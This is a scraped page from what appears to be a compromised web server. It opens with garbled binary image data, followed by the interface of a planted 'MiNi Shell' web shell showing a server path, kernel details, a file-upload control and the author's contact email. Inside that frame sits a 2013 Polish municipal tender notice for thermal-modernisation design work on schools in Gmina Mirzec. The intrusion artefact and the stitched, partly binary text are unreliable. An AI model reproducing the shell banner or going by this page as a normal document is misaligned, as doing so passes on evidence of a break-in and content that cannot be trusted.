JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20130130/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //home/vmanager/www/common/web/tenders/20130130/40942-N-2013.html

<p class="kh_header"><b>Mirzec: Dokumentacja projektowa docieplenia budynków użyteczności publicznej z obszaru gminy Mirzec w ramach projektu pn. Termomodernizacja budynków użyteczności publicznej z obszaru Gminy Mirzec z zastosowaniem odnawialnych źródeł energii</b><br>
<b>Numer ogłoszenia: 40942 - 2013; data zamieszczenia: 30.01.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Mirzec , Mirzec Stary 9, 27-220 Mirzec, woj. świętokrzyskie, tel. 041 2713033, faks 041 2713033.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> ugmirzec.sisco.info</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dokumentacja projektowa docieplenia budynków użyteczności publicznej z obszaru gminy Mirzec w ramach projektu pn. Termomodernizacja budynków użyteczności publicznej z obszaru Gminy Mirzec z zastosowaniem odnawialnych źródeł energii.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest: opracowanie kompletnej dokumentacji technicznej 	docieplenia budynków użyteczności publicznej z obszaru Gminy Mirzec w ramach 	termomodernizacji z zastosowaniem odnawialnych źródeł energii (projekty budowlano- wykonawcze, przedmiary i kosztorysy inwestorskie oraz specyfikacje techniczne 	wykonania i odbioru robót, plan BIOZ obejmujący niżej wymienione obiekty użyteczności publicznej:
1.Szkoła Podstawowa w Tychowie Starym, Tychów Stary 69, gm. Mirzec,
2.Szkoła Podstawowa w Tychowie Nowym, Tychów Nowy 87, gm. Mirzec,
3.Szkoła Podstawowa w Trębowcu, Trębowiec Duży 54, gm. Mirzec,
4.Publiczna Szkoła Podstawowa im. Kamili i Józefa Spytków w Mircu, Mirzec Stary 10,  gm. Mirzec,
5.Szkoła Podstawowa z Oddziałami Integracyjnymi w Jagodnem, Jagodne 102, gm. Mirzec,
6.Publiczna Szkoła Podstawowa im. Gustawa Kwiecińskiego w Osinach, Osiny 101 gm. Mirzec,
7.Gimnazjum Publiczne z Oddziałami Integracyjnymi im. J. i J. Prendowskich w Mircu, Mirzec Stary 10.
8.Szkoła Podstawowa im. E. Staniewskiej w Małyszynie, Małyszyn Górny 70.
Opis stanu istniejącego:
      
Zamawiający posiada audyty energetyczne sporządzone dla poszczególnych obiektów użyteczności publicznej.
Wymagany zakres rzeczowy 

1.Opracowanie kompleksowej dokumentacji projektowej dla każdego ww. budynku odrębnie (na podstawie wykonanych już audytów energetycznych) 5 egz.
2.Przygotowanie i złożenie kompletnego zgłoszenia robót budowlanych w Starostwie Powiatowym w Starachowicach lub złożenie kompletnego wniosku o wydanie decyzji w sprawie zatwierdzenia projektu budowlanego i pozwolenia na budowę (jeżeli będzie wymagane na podstawie przepisów szczególnych- ewentualnie mapa do celów projektowych po stronie wykonawcy) 
3.Wykonanie przedmiarów robót- 2 egz.
4.Wykonanie kosztorysów inwestorskich - 2 egz.
5.Wykonanie zestawienia kosztów dla każdego budynku oddzielnie oraz zbiorczego zestawienia kosztów ( kompleksowe dla całego projektu) - 2 egz.
6.Wykonanie specyfikacji technicznych wykonania i odbioru robót budowlanych - 3 egz. wraz z formą elektroniczną - płyta CD (kosztorysy w plikach PDF, przedmiary PDF oraz EXCEL).

Dokumentacja powinna uwzględniać  min. ocieplenie ścian zewnętrznych, ocieplenie stropu, wymianę pieca c.o., montaż kolektorów słonecznych, montaż zaworów termostatycznych oraz inne prace wynikające z poszczególnych audytów energetycznych wybierając wariant optymalny jako podstawa prac termomodernizacyjnych. 
Dokumentacja projektowa będzie służyć jako opis przedmiotu zamówienia do postępowania przetargowego prowadzonego w oparciu o ustawę Prawo Zamówień Publicznych na roboty budowlane. Dokumentacja projektowa powinna być kompletna z punktu widzenia celu, któremu ma służyć.
	
Dokumentacja może być elementem dokumentacji aplikacyjnej o dofinansowanie kompleksowego przedsięwzięcia z obszaru programowego - Efektywność energetyczna i odnawialne źródła energii- w ramach Mechanizmu Finansowanie Europejskiego Obszaru Gospodarczego na lata 2009-2014 projektu pn. Termomodernizacja budynków użyteczności publicznej z obszaru Gminy Mirzec z zastosowaniem odnawialnych źródeł energii.
-Opracowywaniu ww. dokumentacji winno nastąpić na podstawie: audytów energetycznych posiadanych przez Zamawiającego- załączniki Nr 9.
projekty budowlano- wykonawcze  oraz projekty poszczególnych branż tj. instalacji C.O. i C.W.U., wodociągowej, sanitarnej i energii elektrycznej, o ile wystąpi konieczność ich wykonania.
-specyfikacje techniczne poszczególnych branż wykonane zgodnie z rozporządzeniem Ministra Infrastruktury z dnia 2 września 2004 r. w sprawie szczegółowego zakresu i formy dokumentacji projektowej,  specyfikacji technicznej wykonania i odbioru robót budowlanych oraz programu funkcjonalno - użytkowego (Dz. U. z 2004  Nr 202 poz. 2072 z póź. zm.).
-kosztorysy inwestorskie dla poszczególnych branż i przedmiary robót wykonane zgodnie z rozporządzeniem Ministra Infrastruktury z dnia 18 maja 2004 r. w sprawie określenia metod i podstaw sporządzania kosztorysu inwestorskiego, obliczania planowanych kosztów prac projektowych oraz planowanych kosztów robot budowlanych ( Dz. U. z 2004 r. Nr 130 poz. 1389). Przedmiary robót i kosztorysy inwestorskie należy sporządzić metodą uproszczoną z uwzględnieniem zestawienia R(Robocizna), M(materiał) i S (sprzęt) w podziale na poszczególne etapy wykonawstwa.
-plan bezpieczeństwa i ochrony zdrowia (BIOZ) w oparciu o warunki określone w rozporządzeniu Ministra Infrastruktury z dnia 23 czerwca 2003 r. (Dz. U. z 2003 r. Nr 120 poz. 1126)   
Dokumentacja techniczna obejmuje :
-Sporządzenie dokumentacji projektowo - kosztorysowej w skład której wchodzą:
a) inwentaryzacja obiektów poddanych pracom termomodernizacyjnym i remontowym,
b) kompleksowe projekty budowlano- wykonawcze każdego zadania wynikającego z audytów energetycznych w 5 egzemplarzach w wersji papierowej oraz wersji elektronicznej na nośniku CD-ROM 1 egz.
c) specyfikacje techniczne wykonania i odbioru robót budowlanych w 2 egzemplarzach w wersji papierowej oraz wersji elektronicznej na nośniku CD-ROM
d) sporządzone kosztorysy inwestorskie, ofertowe i przedmiary robót poszczególnych  branż w 2 egzemplarzach w wersji papierowej oraz wersji elektronicznej na nośniku CD-ROM
-Wersje elektroniczne dokumentacji na nośnikach CD-ROM:
a)  rysunki winny być zapisane w formacie *pdf, *jpg lub *gif , tekst w formacie. doc. (MS Word)
b) specyfikacje techniczne winny być zapisane w powszechnie używanym edytorze tekstowym w formacie *.doc lub * pdf,
c) przedmiary robót winny być zapisane w powszechnie używanym arkuszu kalkulacyjnym w formacie *.xls, (Ms Excel) oraz * pdf,
d) kosztorysy inwestorskie maja być zapisane w formacie..xls (Ms Excel).
e) wszystkie dokumenty uzgadniające, decyzje, opinie itd. winny być zeskanowane i załączone do dokumentacji przekazywanej na nośniku CD - ROM  jako opracowania przekazane w wersji elektronicznej na nośniku CD - ROM w formacie pdf  umożliwjący wydruk materiałów przygotowanych w formie graficznej.                   
- Do zadań Wykonawcy należy ponadto :
1) uzyskanie wszystkich wymaganych decyzji, opinii, uzgodnień, sprawdzenia dokumentacji projektowych niezbędnych do uzyskania pozwolenia na budowę i realizacji robót lub zgłoszenia zamiaru wykonania robót objętych zakresem dokumentacji,. a w szczególności uzgodnień: rzeczoznawców ds. BHP, sanitarno- higienicznych i p.poż., jeżeli będzie wymagane.
2) dokumentację techniczną należy wykonać zgodnie z obowiązującymi przepisami, normami, ze sztuka budowlaną oraz winna ona być opatrzona klauzulą o kompletności i przydatności z punktu widzenia celu, któremu ma służyć,
3)informacje zawarte w dokumentacji projektowej w zakresie technologii wykonania robót, doboru materiałów i urządzeń należy określić w sposób zgodny z ustawą Prawo Zamówień Publicznych,
4)zamawiający wymaga dokonania sprawdzenia dokumentacji projektowej przez osobę posiadającą wymagane uprawnienia. Każdy egzemplarz dokumentacji projektowej musi być podpisany przez projektanta i sprawdzającego
5)  przekazanie dokumentacji technicznej nastąpi w siedzibie Zamawiającego na podstawie protokółu odbioru zdawczego podpisanego przez upoważnionych przedstawicieli Wykonawcy i  Zamawiającego.
 6) Wykonawca złoży zgłoszenie zamiaru wykonania robót-wniosek o wydanie pozwolenia na budowę z potwierdzeniem wpływu do Starostwa Powiatowego w terminie do dnia 20. 03. 2013 r.
7) Wykonawca złoży wycenę ofertową ryczałtową składającą się na wynagrodzenie wykonawcy z uwzględnieniem poszczególnych elementów prac projektowych. 
Wymagany okres gwarancji dokumentacji technicznej:

Wykonawca udzieli gwarancji jakości na wykonany przedmiot zamówienia na okres 3 lat przy czym uprawnienia Zamawiającego z tytułu rękojmi zostają rozszerzone do czasu wygaśnięcia odpowiedzialności wykonawcy (wykonawców) robót budowlanych z tytułu rękojmi za wady robót budowlanych wykonanych na podstawie tej dokumentacji.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 71.32.00.00-7.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 20.03.2013.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>aktualny odpis z właściwego rejestru KRS, jeżeli odrębne przepisy wymagają wpisu do rejestru wydanego nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>wykaz wykonanych w okresie ostatnich 3 lat (a jeśli okres działalności jest krótszy - w tym okresie) co najmniej dwóch usług odpowiadających swoim rodzajem oraz wartością stanowiącym przedmiot zamówienia z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, instytucji dla których realizowano zamówienie). Do wykazu należy dołączyć dokument potwierdzający, że usługi projektowe zostały wykonane należycie.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>wykonawca, wykaże osoby, które będą uczestniczyć w wykonywaniu tego zamówienia i przedłoży oświadczenie i dokumenty, na temat kwalifikacji zawodowych określające, że osoby te posiadają wymagane uprawnienia budowlane do projektowania i sprawdzania projektów architektoniczno - budowlanych w specjalności: 
a) architektonicznej,
b) instalacyjnej w zakresie sieci, instalacji i urządzeń cieplnych, wentylacyjnych,   gazowych, wodociągowych, kanalizacyjnych i elektrycznych,</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>wykonawca winien przedłożyć aktualną opłaconą polisę ubezpieczeniową, a w przypadku jego braku inny dokument potwierdzający, że Wykonawca jest ubezpieczony od odpowiedzialności w zakresie prowadzonej działalności związanej z przedmiotem zamówienia i wartością obejmującą cały zakres zamówienia wraz z dowodem opłaty</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający wymaga zawarcia umowy na warunkach określonych w projekcie umowy stanowiącym załącznik nr 8 do SIWZ. 
-Zamawiający uznaje, że zgodnie z art. 144 u PZP dopuszcza się zmiany zawartej umowy.
- Zamawiający dopuszcza możliwość dokonania w umowie następujących zmian:
1)	zmiany urzędowej stawki podatku od towarów i usług, 
2)	zmiany danych objętych fakturą, w szczególności NIP-u, adresu, nazwy lub numeru rachunku Wykonawcy,
3)	 zmiany osób odpowiedzialnych za prowadzenie robót z ramienia każdej ze stron.
4)	w przypadku braku możliwości, uzyskania przez Wykonawcę wymaganych uzgodnień, opinii, decyzji w terminie umownym przy należytej staranności i terminowości działań przez Wykonawcę. Strony mogą przedłużyć termin realizacji zamówienia bez możliwości zwiększenia wynagrodzenia wykonawcy.
5)	w przypadku konieczności zmian do przedmiotu zamówienia na skutek wydanych decyzji lub innych wymogów lub uzgodnień organów zewnętrznych pod warunkiem wprowadzenia określonych modyfikacji. Strony mogą przedłużyć termin realizacji przedmiotu zamówienia na okres potrzebny na dokonanie zmian bez możliwości zwiększenia wynagrodzenia Wykonawcy,  
Wynagrodzenie Wykonawcy będzie płatne za wykonanie  i odebrane całości zadania</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> ugmirzec.sisco.info<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Gminy w Mircu, Mirzec Stary 9, 27-220 Mirzec, pokój 302, 311.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 07.02.2013 godzina 12:00, miejsce: Urząd Gminy w Mircu, Mirzec Stary 9, 27-220 Mirzec, pokój 220.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Dokumentacja może być elementem dokumentacji aplikacyjnej o dofinansowanie kompleksowego przedsięwzięcia z obszaru programowego - Efektywność energetyczna i odnawialne źródła energii - w ramach Mechanizmu Finansowanie Europejskiego Obszaru Gospodarczego na lata 2009-2014 projektu pn.Termomodernizacja budynków użyteczności publicznej z obszaru Gminy Mirzec z zastosowaniem odnawialnych źródeł energii.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com